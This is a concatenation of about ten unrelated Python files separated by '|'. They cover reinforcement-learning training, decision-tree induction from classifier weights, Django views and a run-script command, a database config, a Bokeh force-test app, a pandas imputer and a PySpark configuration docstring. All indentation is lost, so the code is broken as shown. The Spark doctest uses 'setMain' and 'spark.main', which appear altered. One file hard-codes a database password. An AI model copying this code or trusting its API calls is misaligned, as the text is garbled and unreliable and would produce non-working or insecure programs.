# bg_rollouts_test = []
# fg_rollouts_test = []
# if init_experience > 0:
# for _ in range(init_experience):
# rollout_bg, episode_cost = eval_env_bg.generate_rollout(
# None, render=False, group=0
# )
# rollout_fg, episode_cost = eval_env_fg.generate_rollout(
# None, render=False, group=1
# )
# bg_rollouts_test.extend(rollout_bg)
# fg_rollouts_test.extend(rollout_fg)
# bg_rollouts_test.extend(fg_rollouts)
# all_rollouts_test = bg_rollouts_test.copy()
# state_action_b, target_q_values, groups = nfq_agent.generate_pattern_set(all_rollouts_test)
# X_test = state_action_b
bg_success_queue = [0] * 3
fg_success_queue = [0] * 3
epochs_fg = 0
eval_fg = 0
# import ipdb; ipdb.set_trace()
for epoch in range(epoch + 1):
state_action_b, target_q_values, groups = nfq_agent.generate_pattern_set(
all_rollouts
)
X = state_action_b
if not nfq_net.freeze_shared:
loss = nfq_agent.train((state_action_b, target_q_values, groups))
eval_episode_length_fg, eval_success_fg, eval_episode_cost_fg = 0, 0, 0
if nfq_net.freeze_shared:
eval_fg += 1
if eval_fg > 50:
loss = nfq_agent.train((state_action_b, target_q_values, groups))
if is_contrastive:
# import ipdb; ipdb.set_trace()
if nfq_net.freeze_shared:
(
eval_episode_length_fg,
eval_success_fg,
eval_episode_cost_fg,
) = nfq_agent.evaluate(eval_env_fg, render=False)
for param in nfq_net.layers_fg.parameters():
assert param.requires_grad == True
for param in nfq_net.layers_shared.parameters():
assert param.requires_grad == False
else:
for param in nfq_net.layers_fg.parameters():
assert param.requires_grad == False
for param in nfq_net.layers_shared.parameters():
assert param.requires_grad == True
(
eval_episode_length_bg,
eval_success_bg,
eval_episode_cost_bg,
) = nfq_agent.evaluate(eval_env_bg, render=False)
else:
(
eval_episode_length_bg,
eval_success_bg,
eval_episode_cost_bg,
) = nfq_agent.evaluate(eval_env_bg, render=False)
(
eval_episode_length_fg,
eval_success_fg,
eval_episode_cost_fg,
) = nfq_agent.evaluate(eval_env_fg, render=False)
# bg_success_queue.pop()
bg_success_queue = bg_success_queue[1:]
bg_success_queue.append(1 if eval_success_bg else 0)
fg_success_queue = fg_success_queue[1:]
fg_success_queue.append(1 if eval_success_fg else 0)
printed_bg = False
printed_fg = False
if sum(bg_success_queue) == 3 and not nfq_net.freeze_shared == True:
if epochs_fg == 0:
epochs_fg = epoch
printed_bg = True
nfq_net.freeze_shared = True
if verbose:
print("FREEZING SHARED")
if is_contrastive:
for param in nfq_net.layers_shared.parameters():
param.requires_grad = False
for param in nfq_net.layers_last_shared.parameters():
param.requires_grad = False
for param in nfq_net.layers_fg.parameters():
param.requires_grad = True
for param in nfq_net.layers_last_fg.parameters():
param.requires_grad = True
# else:
# for param in nfq_net.layers_fg.parameters():
# param.requires_grad = False
# for param in nfq_net.layers_last_fg.parameters():
# param.requires_grad = False
optimizer = optim.Adam(
itertools.chain(nfq_net.layers_fg.parameters()), lr=1e-1
)
nfq_agent._optimizer = optimizer
# break
# Print current status
if verbose:
logger.info(
# "Epoch {:4d} | Eval BG {:4d} / {:4f} | Eval FG {:4d} / {:4f} | Train Loss {:.4f}".format(
# epoch, eval_env_bg.success_step, eval_episode_cost_bg, eval_env_fg.success_step, eval_episode_cost_fg, loss
# )
"Epoch {:4d} | Eval BG {:4d} / {:4f} | Eval FG {:4d} / {:4f} | Train Loss {:.4f}".format(
epoch,
eval_episode_length_bg,
eval_episode_cost_bg,
eval_episode_length_fg,
eval_episode_cost_fg,
loss,
)
)
if sum(fg_success_queue) == 3:
printed_fg = True
if verbose:
logger.info(
"Epoch {:4d} | Total Cycles {:6d} | Total Cost {:4.2f}".format(
epoch, len(all_rollouts), total_cost
)
)
break
eval_env_bg.step_number = 0
eval_env_fg.step_number = 0
eval_env_bg.max_steps = 1000
eval_env_fg.max_steps = 1000
performance_fg = []
performance_bg = []
num_steps_bg = []
num_steps_fg = []
total = 0
for it in range(evaluations):
# eval_env_bg.save_gif = True
print("BG")
(
eval_episode_length_bg,
eval_success_bg,
eval_episode_cost_bg,
) = nfq_agent.evaluate(eval_env_bg, True)
# eval_env_bg.create_gif()
if verbose:
print(eval_episode_length_bg, eval_success_bg)
num_steps_bg.append(eval_episode_length_bg)
performance_bg.append(eval_episode_length_bg)
total += 1
train_env_bg.close()
eval_env_bg.close()
# eval_env_fg.save_gif = True
print("FG")
(
eval_episode_length_fg,
eval_success_fg,
eval_episode_cost_fg,
) = nfq_agent.evaluate(eval_env_fg, render=True)
# eval_env_fg.create_gif()
if verbose:
print(eval_episode_length_fg, eval_success_fg)
num_steps_fg.append(eval_episode_length_fg)
performance_fg.append(eval_episode_length_fg)
total += 1
train_env_fg.close()
eval_env_fg.close()
print("Fg trained after " + str(epochs_fg) + " epochs")
print("BG stayed up for steps: ", num_steps_bg)
print("FG stayed up for steps: ", num_steps_fg)
return performance_bg, performance_fg
if __name__ == "__main__":
import json
num_iter = 10000
results = {}
results["linear_model"] = []
# results["nfqi"] = []
results = {}
for i in range(0, 11):
results[i] = {}
results[i]["cfqi"] = {}
results[i]["fqi"] = {}
results[i]["warm_start"] = {}
results[i]["tl"] = {}
for i in range(num_iter):
for f in range(0, 11):
# Linear model
performance_bg, performance_fg = run_lm(
is_contrastive=False,
init_experience_bg=200,
init_experience_fg=200,
fg_only=False,
force_left=0,
epoch=200,
verbose=True,
)
results[f]["cfqi"][i] = (performance_fg, performance_bg)
# import ipdb; ipdb.set_trace()
with open("linear_model_force_range.json", "w") as f:
json.dump(results, f)
|
b = 10; c = 20;
a=b+c;
print(a)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 2 21:37:34 2020
@author: Weifan Chen , Diala @ Boston Univeristy
A fast demo on the guided induction decision tree.
similarity matrix meaning, for m_ij
is the similarity score between class i and j (so the matrix is symmetric)
if i and j are the mutual best match, then m_ij should be the largest entry among all the
entries in the cross, centered at i,j. (not counting i,i and j,j the self similarity
score which is the largest)
Result:
for the CIFAR10 dataset, the pretrained WideResNet28 model (without any interference
by NBDT, just a pure pretrained model on CIFAR10), the guided induction algorithm
would give the same structure as WordNet gives, with the sole exception on
label 2 (bird) and label 6 (frog).
"""
from operator import itemgetter
import numpy as np
import nbdt
import networkx as nx
'''
Node represents a node in the NBDT
Attribute:
index: as identifier of each class, only on the leaf nodes layer, the index rep the real class label.
for intermediate node, the index should also give the correct weights by matrix[index,:]
depth: leaf node has depth==0, increment by 1 for each induced layer. Caveat: there exists node increases depth
but has no pair (go to next layer by itself, without induction with other node)
weight: it's associate weight, the number of entry should equal to the number of output nodes from the backbone DNN
this should equal to matrix[index,:]
children: the previous layer sub node derived from this node
parent: node
matrix: the weight matrix that serves a similar role as the starting big matrix. Semantically this is quite different from
a weight matrix in dnn
best_match: tuple consisting of node index and similarity value between this node and its best match
(new) terminals: list of Node, to calculate the similarity between two trees, each intermediate node needs
the information of all the leaves (terminals) branched from it (the root of the substree)
(new) isLeaf: bool :
(new) isTransit: bool: if a node has only one child, then this node is Transit. Leaf node is also transit, since we dont' want them
to participate the calculation for tree similarity
Method:
calc_weight (static) : this could be used by a parent to get its weights by passing its children to this method
'''
# TODO: consider wnids instead of index
# TODO: then we can use wnid_to_node to create Node objects
# TODO: num_classes needed in TreeSupLoss
# TODO: test passing the Graph to TreeSupLoss class / SoftNBDT
class Node():
def __init__(self, index, depth, weight, *children, name=None, formal_name=None, parent=None, matrix=None,
matches=None, best_match=None, wnid=None):
self.index = index
self.depth = depth
self.weight = weight
self.matrix = matrix
self.children = children
self.name = name
self.parent = parent
self.matches = matches
self.best_match = best_match
self.terminals = [] ## leaf hold itself as an entry, so that for parents, they can get theirs by concatenate all their children's terminal
self.isLeaf = False
self.isTransit = False
self.wnid = wnid
self.formal_name = None
def __len__(self):
return len(self.children)
def __eq__(self, other):
return self.name == other.name
def __str__(self):
return self.name
def __hash__(self):
return hash(str(self))
def set_isLeaf_true(self):
self.isLeaf = True
def set_isTransit_true(self):
self.isTransit = True
@staticmethod
def calc_weight(nodes, method='average'):
weights = np.array([node.weight for node in nodes])
if method == 'average':
return np.average(weights, axis=0)
'''
Method for building the leaf node of NBDT
Params:
matrix: the very last weight matrix of the pretrained model
depth: should always be zero, since this method is only used for building leaf
classes: list of names for each label
'''
def build_leaf_nodes(matrix, metric, depth=0, classes=None, wnids=None, verbose=1):
# get the similarity matrix
if verbose > 0: print('build_leaf_nodes called')
simi_mat = simi_matrix(matrix, metric)
if verbose > 0: print('simi mat generate done')
# create nodes
nodes = []
for i in range(0, matrix.shape[0]):
if verbose > 0: print('start create node ', i)
node = Node(i, depth, matrix[i, :].numpy().copy(), None, matrix=matrix, matches=simi_mat[i])
if classes is not None:
node.name = classes[i]
node.formal_name = classes[i]
if wnids is not None: node.wnid = wnids[i]
node.matches = set()
nodes.append(node)
# compute matches for each node
for i in range(len(simi_mat)):
if verbose > 0: print('compute match, ', i)
mask = np.zeros(simi_mat[i].size, dtype=bool)
mask[i] = True
masked = np.ma.array(simi_mat[i], mask=mask)
j = masked.argmax()
value = masked.max()
nodes[i].matches.add((j, value))
nodes[j].matches.add((i, value))
[node.set_isLeaf_true() for node in nodes]
[node.set_isTransit_true() for node in nodes]
[node.terminals.append(node) for node in nodes]
return nodes
"""
*** Method for user ***
build the entire hierarchy
Param:
model: the pretrained model
metric (callable) to calculate the similarity between two class
TODO: extend the metric for multi class
classes: list of names for each class
method: how to calculate the node weight
avail args: 'average' : use the average node weight from all its children
policy: how to deal with nodes that do not have mutual best match
avail args: 'wait' : unpaired node would become parent of itself, nothing changes
"""
def build_full(w, b, metric, classes=None, wnids=None, method='average', policy='wait', verbose=0):
# try:
# w = model['fc.weight'].numpy() ## TODO: this part could udpate according to alvin's implementation
# b = model['fc.bias'].numpy()
# except: # if model has been loaded from checkpoint
# w = model['module.fc.weight'].cpu().numpy()
# b = model['module.fc.bias'].cpu().numpy()
print('building starts...')
print('shape of the output layer: ', w.shape)
G = nx.DiGraph()
nodes = build_leaf_nodes(w, metric, classes=classes, wnids=wnids, verbose=verbose)
if verbose > 0: print('build leaf done.')
for n in nodes:
G.add_node(n)
nodes_temp = nodes
n_nodes = len(nodes)
while True:
if verbose > 0: print('call init_next_layer')
nodes, mat, G = init_next_layer(G, nodes_temp, metric, method=method, policy=policy)
if len(nodes) == 1 or len(nodes) == n_nodes:
print('induction done with ', len(nodes), ' root nodes.')
return G, nodes
n_nodes = len(nodes)
nodes_temp = nodes
'''
Output a list of induced node and the weight matrix for the newly generated layers.
The output could be the new input for the method, until reducing to only one node or
model does not converge anymore.
Params:
nodes: list of nodes to be induced on
metric (callable) : rule to compute similarity
Return:
new_nodes: list of nodes for induction layer
new_matrix: a finished big matrix used by induction nodes
'''
def init_next_layer(G, nodes, metric, method='average', policy='wait', verbose=0):
# step 1 : get variables needed for build induction node
cur_depth = nodes[0].depth
matrix = nodes[0].matrix
pairs, singles = get_pairs(matrix, metric)
assert len(pairs) * 2 + len(singles) == matrix.shape[0], 'this should add up'
if policy == 'wait':
class_n = matrix.shape[0] - len(
pairs) ## implicitly , two nodes induce one , or a node leftover .total - 2 * n_pair + n_pair
new_matrix = np.zeros((class_n, matrix.shape[1])) ## each new parent should hold a reference of this matrix
elif policy == 'wait-match':
from math import ceil
new_matrix = np.zeros(
(ceil(matrix.shape[0] / 2), matrix.shape[1])) ## this is the ceil of division by 2 , ceil(5/2) = 3
"""
BUG: the bug should be here somehow, since right now this calculation does not hold true
since singles are somehow also paired, so the matrix is in wrong dimentiosn at axis=0
"""
index = 0
new_nodes = []
# step 2 : for those have mutual best match nodes, instantiate their parent
for pair in pairs:
children = _pair_to_nodes(nodes, pair)
parent = Node(index, cur_depth + 1, None, *children, matrix=new_matrix)
[parent.terminals.extend(child.terminals) for child in children] ## add terminal info to parent
parent.wnid = ''.join([child.wnid for child in parent.children])
parent.weight = Node.calc_weight(parent.children, method)
parent_name = ''
for child in children:
child.parent = parent
parent_name += child.name + '-'
parent.formal_name = '(' + ','.join([child.formal_name for child in children]) + ')'
parent.name = parent_name
new_nodes.append(parent)
G.add_node(parent)
for i in children: G.add_edge(parent, i) # this is a directed edge
index += 1
# step 3 : for those unpaired, based on policy, to decide how to connect them
if verbose > 0:
print('at depth ', cur_depth, ', ', len(singles), ' unpaired nodes.')
if policy == 'wait':
# Not creating new node, simply pass the old node to the new layer, otherwise G would be disconnected
for n in singles:
child = nodes[n]
child.index = index
child.depth = cur_depth + 1
child.matrix = new_matrix
new_nodes.append(child)
index += 1
# add a new policy here that based on the fact that each submatrix contains at least one mutual best match albeit this is not proved
elif policy == 'wait-match':
# step 1: use all the singles weight to create the sub matrix
# step 2: use get_pairs to form a merge
# step 3: build parents as necessary
# step 4: repeat until there is nothing left or only one remains
while (len(singles) > 1):
weights = [nodes[n].weight for n in singles]
mat = np.stack(weights, axis=0)
## reindex the nodes here
t_node = [nodes[n] for n in singles]
nodes = t_node
pairs, singles = get_pairs(mat, metric)
assert len(pairs) * 2 + len(singles) == mat.shape[0], 'this should add up'
## same code from the starting init_next_layer, with modification, since we need to concat the existing new_matrix
for pair in pairs:
children = _pair_to_nodes(nodes, pair)
parent = Node(index, cur_depth + 1, None, *children, matrix=new_matrix)
[parent.terminals.extend(child.terminals) for child in children] ## add terminal info to parent
parent.wnid = ''.join([child.wnid for child in parent.children])
parent.weight = Node.calc_weight(parent.children, method)
parent_name = ''
for child in children:
child.parent = parent
parent_name += child.name + '-'
parent.formal_name = '(' + ','.join([child.formal_name for child in children]) + ')'
parent.name = parent_name
new_nodes.append(parent)
G.add_node(parent)
for i in children: G.add_edge(parent, i) # this is a directed edge
index += 1
if len(singles) == 1:
child = nodes[singles[0]]
child.index = index
child.depth = cur_depth + 1
child.matrix = new_matrix
new_nodes.append(child)
index += 1
elif policy == 'match':
# new_mat = nodes[singles[0]].matrix
if len(singles) > 1:
children = [nodes[i] for i in singles]
# print(simi_mat)
# get best match for each single
for n in singles:
## WF: if all singles are at the same depth, their .matrix should be the same, so this can move outside the for loop
simi_mat = simi_matrix(nodes[n].matrix, metric)
mask = np.zeros(len(simi_mat[n]), dtype=bool)
mask[n] = True
masked = np.ma.array(simi_mat[n], mask=mask)
j = masked.argmax()
value = masked.max()
nodes[n].best_match = (j, value)
nodes[n].matches.remove(nodes[n].best_match)
print(nodes[n].matches)
# now update similarities of the other matching classes
for cls, val in nodes[n].matches:
excluded = nodes[cls].matches - {(cls, val)}
print(excluded)
cls_simi = [(cls1, min(val, val1)) for cls1, val1 in excluded]
# print("matching %d with %s" % (cls, cls_simi))
nodes[cls].matches = {max(cls_simi, key=itemgetter(1))}
print(nodes[cls].__str__(), nodes[cls].best_match[0])
parent = Node(index, cur_depth + 1, None, [nodes[cls], nodes[n]], matrix=new_matrix)
parent.weight = Node.calc_weight(parent.children, method)
parent_name = ''
for child in children:
child.parent = parent
parent_name += child.name + '-'
parent.name = parent_name
G.add_node(parent)
new_nodes.append(parent)
for i in children:
G.add_edge(parent, i)
# step 4: use parents' weight to fill up the bigger matrix
for i, parent in enumerate(new_nodes):
new_matrix[i, :] = parent.weight.reshape(1, new_matrix.shape[1])
return new_nodes, new_matrix, G
def _pair_to_nodes(nodes, pair):
return [nodes[index] for index in pair]
'''
parameter:
w: np.array for the weight matrix,
clas1, clas2 are index of the class
metric (callable) the function map to the weight pairs
e.g. input a_i conects class1 and class2 by two weights, the
metric would output a number based on this two value,
the returned value should be a indication of the similarity
between the two classes from the perspective of input a_i
return: similarity score between cls1 and cls2
'''
def simi(w, cls1, cls2, metric):
"""it metric as a method only used here, so we can savely make it a string and use accordingly"""
v1, v2 = w[cls1,:], w[cls2,:]
if metric == 'naive':
metric = naive
return sum(map(metric, list(zip(w[cls1, :], w[cls2, :]))))
elif metric == 'l1':
return np.average(abs(v1-v2))
elif metric == 'l2':
return np.average((v1-v2)**2)
elif metric == 'cos':
return np.average(v1*v2)
elif metric == 'euc':
return np.sqrt(sum((v1-v2)**2))
elif metric == 'poincare':
return np.arccosh(1 + 2*np.linalg.norm(v1-v2)*np.linalg.norm(v1-v2)/( (1-np.linalg.norm(v1)*np.linalg.norm(v1)) * (1-np.linalg.norm(v2)*np.linalg.norm(v2)) ))
else:
raise AttributeError('unknown metric ', metric)
'''
The callable for metric in simi
if two weights are all positive, then we take the smaller one
if two weights are different sign, we take the negative of the absolution of their difference
otherwise, return 0
TODO: try more metric callable to see which has better meaning
'''
def naive(pair):
x, y = pair
if x >= 0 and y >= 0:
return min(x, y)
elif x * y <= 0:
return -np.abs(x - y)
else:
return 0
'''
Param:
w: np.array of the weight matrix
metric: the callable
Return:
the similarity weight matrix (np.array)
the value m_ij is the similarity score between class i and j
the matrix is symmetric by definition
the diagonal entry should be the largest along its row and column
TODO:
1. normalization?
'''
def simi_matrix(w, metric):
# print('simi matrix called')
n = w.shape[0]
# print('n: ', n)
mat = np.zeros((n, n))
# print('mat shape: ', mat.shape)
for i in range(0, n):
for j in range(0, n):
mat[i, j] = simi(w, i, j, metric)
return mat
def resmat(mat):
mat_cpy = mat.copy()
col_mat = np.zeros(mat.shape)
row_mat = np.zeros(mat.shape)
np.fill_diagonal(mat_cpy, np.NINF)
indice_col = np.argmax(mat_cpy, axis=0)
indice_row = np.argmax(mat_cpy, axis=1)
for i in range(0, col_mat.shape[0]):
col_mat[indice_col[i], i] = 1
row_mat[i, indice_row[i]] = 1
return np.logical_and(col_mat, row_mat), col_mat, row_mat
def induce_pairs(hot_mat):
x, y = np.where(np.tril(hot_mat) == 1)
pairs = [pair for pair in zip(x, y)]
assert len(pairs) == hot_mat.sum() / 2, 'unmatched pair'
indice = [index for pair in pairs for index in pair]
singles = []
for i in range(0, hot_mat.shape[0]):
if i not in indice:
singles.append(i)
return pairs, singles
'''
This method is a pipline of the previous three, given the big matrix and metric,
output the best match pairs indice, and index of node that are not paired
'''
def get_pairs(w, metric):
hot_mat, _, _ = resmat(simi_matrix(w, metric))
return induce_pairs(hot_mat)
def build_Gw_from_Gn(
Gn): ## build G_wnid from G_node, wnid is only for leaf node and other edge tracking. The label would be replaced by Node.formal_name
Gw = nx.DiGraph()
d = {}
for node in list(Gn.nodes):
d[node.wnid] = node.formal_name
[Gw.add_edge(list(edge)[0].wnid, list(edge)[1].wnid) for edge in list(Gn.edges)]
nx.set_node_attributes(Gw, d, 'label')
return Gw
def display_tree(start_node, verbose=0):
visited = []
queue = []
root = start_node[0]
visited.append(root)
queue.append(root)
while queue:
s = queue.pop(0)
assert s
print(s.depth, s.index, s.name)
if verbose > 0:
print(s.formal_name)
print(s.wnid, '\n')
if s.children[0] is None: ## reaching the leaf, leaf.children = (None,)
continue
for i in s.children:
if i not in visited:
visited.append(i)
queue.append(i)
|
# -*- coding: utf-8 -*-
"""Run a python file within your Django app environment.
Example:
python manage.py run script.py
You can also pass arguments to the file using the following syntax:
python manage.py run script.py:"some_argument --another-argument=something"
"""
import runpy
import sys
import operator
from os import path
from django.core.management.base import BaseCommand, CommandError
def run(filename, args):
if hasattr(args, "split"):
args = args.split()
sys.argv = [filename] + args
runpy.run_path(filename, globals(), run_name="__main__")
class Command(BaseCommand):
args = '<filename:"arg ..." ...>'
help = __doc__
def handle(self, *args, **options):
if not args:
raise CommandError("You must specify at least a python file path to execute.")
args = map(operator.methodcaller("split", ":"), args)
for arg in args:
try:
filename, filename_args = arg
except ValueError:
filename, = arg
filename_args = ""
if not path.isfile(filename):
raise CommandError("{!r} is not a valid file path.".format(filename))
run(filename, filename_args)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from django.http import HttpResponse
from .models import Business, Community, Resident
from django.contrib.auth.decorators import login_required
from .forms import NewBusinessForm, NewCommunityForm, NewCommentForm
from django.contrib.auth.models import User
def welcome(request):
community = Community.objects.all()
return render(request,'home.html',{"community": community})
def businesses(request, hood_id):
business = Business.objects.filter(community_id=hood_id)
print([x.details for x in business])
return render(request,'businesses.html',{"business": business})
def residents(request):
residents = Resident.objects.all()
return render(request,'residents.html',{"residents":residents})
def comments(request):
comments = Comment.objects.all()
return render(request,'businesses.html',{"comments":comments})
@login_required(login_url='/accounts/login/')
def new_business(request):
current_user = request.user
if request.method =='POST':
form = NewBusinessForm(request.POST, request.FILES)
if form.is_valid():
business = form.save(commit=False)
business.resident = current_user
business.save()
return redirect('welcome')
else:
form = NewBusinessForm()
return render(request, 'new_business.html', {"form":form})
@login_required(login_url='/accounts/login/')
def new_community(request):
current_user = request.user
if request.method =='POST':
form = NewCommunityForm(request.POST, request.FILES)
if form.is_valid():
community = form.save(commit=False)
community.resident = current_user
community.save()
return redirect('welcome')
else:
form = NewCommunityForm()
return render(request, 'new_community.html', {"form":form})
@login_required(login_url='/accounts/login/')
def new_comment(request):
current_user = request.user
if request.method =='POST':
form = NewCommentForm(request.POST, request.FILES)
if form.is_valid():
community = form.save(commit=False)
community.resident = current_user
community.save()
return redirect('welcome')
else:
form = NewCommentForm()
return render(request, 'newcomments.html', {"form":form})
|
#!/usr/bin/python3
DATABASE_NAME = 'epytodo'
DATABASE_HOST = 'localhost'
DATABASE_SOCK = '/var/lib/mysql/mysql.sock'
DATABASE_USER = 'lucas'
DATABASE_PASS = 'secretpass'
|
def FeatureExtractor(framework='keras', net='VGG16', layer='default', weights='imagenet', size=None, cuda=False, config=None):
if config is not None:
framework = config.features.framework
net = config.features.net
weights = config.features.weights
cuda = config.gpu
if framework == 'keras' or framework == 'tf':
from feature_extractor_tf import FeatureExtractor as FeatureExtractorTF
return FeatureExtractorTF(net=net, weights=weights)
if framework == 'pytorch':
from feature_extractor_pytorch import FeatureExtractor as FeatureExtractorPyTorch
return FeatureExtractorPyTorch(net=net, cuda=cuda)
|
from src.tindeq import TindeqProgressor
from src.analysis import analyse_data
import time
import numpy as np
import asyncio
import tornado
from bokeh.server.server import Server
from bokeh.application import Application
from bokeh.application.handlers.function import FunctionHandler
from bokeh.plotting import figure, ColumnDataSource
from bokeh.layouts import row, column
from bokeh.models import Button, Slider, Div, Band, Whisker
class IdleState:
bkg = 'orange'
@staticmethod
def update(parent):
parent.div.style['background-color'] = parent.state.bkg
parent.div.text = '10:00'
@staticmethod
def end(parent):
parent.state_start = time.time()
parent.state = CountDownState
class CountDownState:
bkg = 'orange'
duration = 10
@staticmethod
def update(parent):
# count down timer
elapsed = time.time() - parent.state_start
remain = CountDownState.duration - elapsed
fs = int(10 * (remain - int(remain)))
secs = int(remain)
parent.div.text = f"{secs:02d}:{fs:02d}"
parent.div.style['background-color'] = parent.state.bkg
if elapsed > CountDownState.duration:
CountDownState.end(parent)
@staticmethod
def end(parent):
parent.state_start = time.time()
parent.state = GoState
class GoState:
bkg = 'green'
duration = 7
@staticmethod
def update(parent):
# count down timer
elapsed = time.time() - parent.state_start
remain = GoState.duration - elapsed
fs = int(10 * (remain - int(remain)))
secs = int(remain)
parent.div.text = f"{secs:02d}:{fs:02d}"
parent.div.style['background-color'] = parent.state.bkg
if elapsed > GoState.duration:
GoState.end(parent)
@staticmethod
def end(parent):
parent.state_start = time.time()
parent.state = RestState
class RestState:
bkg = 'red'
duration = 3
@staticmethod
def update(parent):
# count up timer
# count down timer
elapsed = time.time() - parent.state_start
remain = RestState.duration - elapsed
fs = int(10 * (remain - int(remain)))
secs = int(remain)
parent.div.text = f"{secs:02d}:{fs:02d}"
parent.div.style['background-color'] = parent.state.bkg
if elapsed > RestState.duration:
RestState.end(parent)
@staticmethod
def end(parent):
if parent.test_done:
parent.state = IdleState
else:
parent.state_start = time.time()
parent.state = GoState
parent.reps -= 1
class CFT:
def __init__(self):
self.x = []
self.y = []
self.xnew = []
self.ynew = []
self.active = False
self.duration = 240
self.reps = 24
self.state = IdleState
self.test_done = False
self.analysed = False
self.tindeq = None
io_loop = tornado.ioloop.IOLoop.current()
io_loop.add_callback(connect, self)
def log_force_sample(self, time, weight):
if self.active:
self.xnew.append(time)
self.ynew.append(weight)
self.x.append(time)
self.y.append(weight)
def reset(self):
self.xnew, self.ynew = [], []
def make_document(self, doc):
source = ColumnDataSource(data=dict(x=[], y=[]))
fig = figure(title='Real-time Data', sizing_mode='stretch_both')
fig.line(x='x', y='y', source=source)
doc.title = "Tindeq CFT"
self.btn = Button(label='Waiting for Progressor...')
duration_slider = Slider(start=5, end=30, value=24,
step=1, title="Reps")
self.laps = Div(text=f'Rep {0}/{duration_slider.value}',
style={'font-size': '400%', 'color': 'black',
'text-align': 'center'})
self.div = Div(text='10:00',
style={'font-size': '800%', 'color': 'white',
'background-color': 'orange',
'text-align': 'center'})
self.results_div = Div(text='', sizing_mode='stretch_width',
style={'font-size': '150%', 'color': 'black',
'text-align': 'left'})
def onclick():
self.reps = duration_slider.value
self.duration = self.reps * 10
io_loop = tornado.ioloop.IOLoop.current()
io_loop.add_callback(start_test, self)
self.btn.on_click(onclick)
widgets = column(duration_slider, self.btn, self.laps, self.div)
first_row = row(widgets, fig)
doc.add_root(column(first_row, self.results_div, sizing_mode="stretch_both"))
self.source = source
self.fig = fig
doc.add_periodic_callback(self.update, 50)
def update(self):
if self.test_done and not self.analysed:
self.btn.label = 'Test Complete'
np.savetxt('test.txt', np.column_stack((self.x, self.y)))
x = np.array(self.x)
y = np.array(self.y)
results = analyse_data(x, y, 7, 3)
tmeans, fmeans, e_fmeans, msg, critical_load, load_asymptote, predicted_force = results
self.results_div.text = msg
fill_src = ColumnDataSource(dict(x=tmeans, upper=predicted_force,
lower=load_asymptote*np.ones_like(tmeans)))
self.fig.add_layout(
Band(base='x', lower='lower', upper='upper', source=fill_src, fill_alpha=0.7)
)
self.fig.circle(tmeans, fmeans, color='red', size=5, line_alpha=0)
esource = ColumnDataSource(dict(x=tmeans, upper=fmeans+e_fmeans, lower=fmeans-e_fmeans))
self.fig.add_layout(
Whisker(source=esource, base='x', upper='upper', lower='lower', level='overlay')
)
self.analysed = True
else:
if self.tindeq is not None:
self.btn.label = 'Start Test'
self.state.update(self)
self.source.stream({'x': self.xnew, 'y': self.ynew})
nlaps = self.duration // 10
self.laps.text = f"Rep {1 + nlaps - self.reps}/{nlaps}"
self.reset()
async def connect(cft):
tindeq = TindeqProgressor(cft)
await tindeq.connect()
cft.tindeq = tindeq
await cft.tindeq.soft_tare()
await asyncio.sleep(5)
async def start_test(cft):
try:
cft.state.end(cft)
await cft.tindeq.start_logging_weight()
await asyncio.sleep(cft.state.duration)
print('Test starts!')
cft.state.end(cft)
cft.active = True
await asyncio.sleep(cft.duration)
await cft.tindeq.stop_logging_weight()
cft.test_done = True
await asyncio.sleep(0.5)
cft.state = IdleState
except Exception as err:
print(str(err))
finally:
await cft.tindeq.disconnect()
cft.tindeq = None
cft = CFT()
apps = {'/': Application(FunctionHandler(cft.make_document))}
server = Server(apps, port=5000)
server.start()
if __name__ == "__main__":
tornado.platform.asyncio.AsyncIOMainLoop().install()
io_loop = tornado.ioloop.IOLoop.current()
print('Opening Bokeh application on http://localhost:5006/')
io_loop.add_callback(server.show, "/")
io_loop.start()
|
import numpy as np
import pandas as pd
from sklearn.base import TransformerMixin
fare_mean = None
class FareFiller(TransformerMixin):
def transform(self, features_raw, **transform_params):
features = features_raw.copy(deep=True)
global fare_mean
if fare_mean is None:
fare_mean = int(features.Fare.mean())
features.Fare.fillna(fare_mean, axis=0, inplace=True)
return features
def fit(self, X, y=None, **fit_params):
return self
def get_params(self, *args, **kwargs):
return {}
|
"""
Catching and handling exceptions demo
"""
import sys
while True:
line = sys.stdin.readline()
if line == "": break
try:
(x, y) = [int(n) for n in line.split()]
print "%d + %d = %d" % (x, y, x + y)
print "%d / %d = %d" % (x, y, x / y)
except ValueError as e:
print "You must type only numbers"
except ZeroDivisionError as e:
print "Sorry, can't divide by zero"
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.conf import SparkConf
>>> from pyspark.context import SparkContext
>>> conf = SparkConf()
>>> conf.setMain("local").setAppName("My app")
<pyspark.conf.SparkConf object at ...>
>>> conf.get("spark.main")
u'local'
>>> conf.get("spark.app.name")
u'My app'
>>> sc = SparkContext(conf=conf)
>>> sc.main
u'local'
>>> sc.appName
u'My app'
>>> sc.sparkHome is None
True
>>> conf = SparkConf(loadDefaults=False)
>>> conf.setSparkHome("/path")
<pyspark.conf.SparkConf object at ...>
>>> conf.get("spark.home")
u'/path'
>>> conf.setExecutorEnv("VAR1", "value1")
<pyspark.conf.SparkConf object at ...>
>>> conf.setExecutorEnv(pairs = [("VAR3", "value3"), ("VAR4", "value4")])
<pyspark.conf.SparkConf object at ...>
>>> conf.get("spark.executorEnv.VAR1")
u'value1'
>>> print conf.toDebugString()
spark.executorEnv.VAR1=value1
spark.executorEnv.VAR3=value3
spark.executorEnv.VAR4=value4
spark.home=/path
>>> sorted(conf.getAll(), key=lambda p: p[0])
[(u'spark.executorEnv.VAR1', u'value1'), (u'spark.executorEnv.VAR3', u'value3'), \
(u'spark.executorEnv.VAR4', u'value4'), (u'spark.home', u'/path')]
"""
__all__ = ['SparkConf']
class SparkConf(object):
"""
Configuration for a Spark application. Used to set various Spark
parameters as key-value pairs.
Most of the time, you would create a SparkConf object with
C{SparkConf()}, which will load values from C{spark.*} Java system
properties as well. In this case, any parameters you set directly on
the C{SparkConf} object take priority over system properties.
For unit tests, you can also call C{SparkConf(false)} to skip
loading external settings and get the same configuration no matter
what the system properties are.
